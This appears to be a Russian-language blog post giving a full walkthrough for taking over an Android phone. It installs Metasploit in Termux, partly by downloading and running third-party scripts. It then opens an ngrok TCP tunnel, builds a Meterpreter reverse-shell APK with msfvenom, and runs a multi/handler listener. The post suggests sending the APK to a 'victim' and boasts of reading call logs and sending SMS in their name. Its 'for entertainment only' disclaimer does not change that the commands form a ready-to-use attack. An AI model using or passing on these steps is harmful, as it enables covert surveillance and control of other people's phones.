Найти в Дзене
Opau

Получение доступа к телефону на Android с помощью ngrok + metasploit

Этот материал несет ознакомительный характер. Я вас ни к чему не призываю! Задача статьи лишь развлекать. За все противоправные действия вы несете полную ответственность. Нихао! Это будет сложная и долгая статья в который я от А до Я опишу получение доступа к любому Android смартфону через вирус удаленного доступа. Слабонервным, которые привыкли вводить 2 команды в Termux не смотреть. Скачать metasploit Не удивляйтесь, даже это вызывает трудности у среднестатистического юзера, хотя достаточно ввести вот такую команду: pkg update && pkg upgrade -y && pkg install x11-repo unstable-repo metasploit Для активации metasploit используются команда msfconsole. Не работает? Такое бывает... Стоит попробовать три сборки ниже Сборка от Hax4Us: pkg update && pkg upgrade && pkg install git curl wget nmap -y && curl -LO raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh && chmod 777 metasploit.sh && ./metasploit.sh Сборка от V3rluchie: pkg update && pkg upgrade && pkg install cur
Оглавление

Этот материал несет ознакомительный характер. Я вас ни к чему не призываю! Задача статьи лишь развлекать. За все противоправные действия вы несете полную ответственность.

Нихао! Это будет сложная и долгая статья в который я от А до Я опишу получение доступа к любому Android смартфону через вирус удаленного доступа. Слабонервным, которые привыкли вводить 2 команды в Termux не смотреть.

Скачать metasploit

Не удивляйтесь, даже это вызывает трудности у среднестатистического юзера, хотя достаточно ввести вот такую команду:

pkg update && pkg upgrade -y && pkg install x11-repo unstable-repo metasploit

Для активации metasploit используются команда msfconsole.

-2

Не работает? Такое бывает... Стоит попробовать три сборки ниже

Сборка от Hax4Us:

pkg update && pkg upgrade && pkg install git curl wget nmap -y && curl -LO raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh && chmod 777 metasploit.sh && ./metasploit.sh

Сборка от V3rluchie:

pkg update && pkg upgrade && pkg install curl wget git && git clone github.com/verluchie/termux-metasploit && chmod 777 termux-metasploit/install.sh && sh termux-metasploit/install.sh

Сборка от Tech-X3:

apt update && apt upgrade && apt install curl && curl -LO raw.githubusercontent.com/1Tech-X/Metasploit-4.16.12/master/metasploit.sh && chmod 777 metasploit.sh && sh metasploit.sh

Скачать ngrok

Тут все значительно сложнее...

Сначала нужно зайти на этот сайт и скачать версию для Linux (arm64), если вы качаете для использования в Termux.

Потом, перекидываем скачанный архив в корневую директорию телефона. Переходим в корневую директорию телефона в терминале Termux командой cd /sdcard/, распаковываем скачанный архив командой unzip ngrok [какие-то цифры].zip. Идем в него командой cd ngrok [какие-то цифры] и отправляем файл ngrok в корневую директорию termux командой mv ngrok $HOME. Осталось вернуться в корневую директорию Termux командой cd $HOME, где будет файл ngrok и дать ему права командой chmod +x ngrok.

Но это еще не все! Для нормальной работы протокола TCP в ngrok (одного из основных протоколов передачи данных) нужно зарегистрироваться на сайте ngrok, чтоб получить токен. Без него никак.

После регистрации и получение токена достаточно ввести ./ngrok authtoken <твой токен>.

Элементарно! Тем более на сайте есть краткая схема, где все описано по шагам.

-3

После, достаточно ввести ./ngrok tcp 4444 и откроется следующая картина

-4

Значимость имеет только строчка Forwarding, которая выглядит следующим образом: tcp://0.tcp.ngrok.io:13284. Последние 5 цифр (порт) у всех отличаются.

Важно! Должна быть включена точка доступа WiFi и мобильный интернет, WiFi должен быть отключен! В альтернативном случае, ничего не выйдет.

Ближе к сути

Честно говоря, я предполагаю, что 90% юзеров уже закрыло статью, ибо люди, в своем большинстве, любят лишь нажимать 2 кнопки 😥. Ну да ладно...

Создание вируса удаленного доступа (зараженного .apk файла) происходит с помощью одной команды.

msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=[номер порта] -o /sdcard/termuxonelove.apk

Все, вирус удаленного доступа создан в .apk файле и хранится в корневой директории телефона! Осталось только забросить его на телефон жертвы. Как это сделать? Я не хакер, и взламывать ни кого не собираюсь. Вообще, можно просто перекинуть по кабелю через комп или по облаку через Telegram или Google Drive.

Как управлять телефоном жертвы?

После того, как зараженный .apk файл оказался в телефоне, хакеру достаточно написать следующие команды:

msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost localhost

set lport 4444

exploit

После, нужно ждать, пока жертва не откроет этот файл! После, хакер получает полный доступ к телефону жертвы! Что он может сделать? Практически все! Проще сказать, что он не может сделать...

-5

Например, он может получить доступ к полному журналу звонков, отправлять SMS от имя жертвы и это лишь крупица его возможностей.

Чтобы узнать все функции можно написать команду help.

Напомню, что этот материал несет ознакомительный характер. Я вас ни к чему не призываю! Задача статьи лишь развлекать. За все противоправные действия вы несете полную ответственность.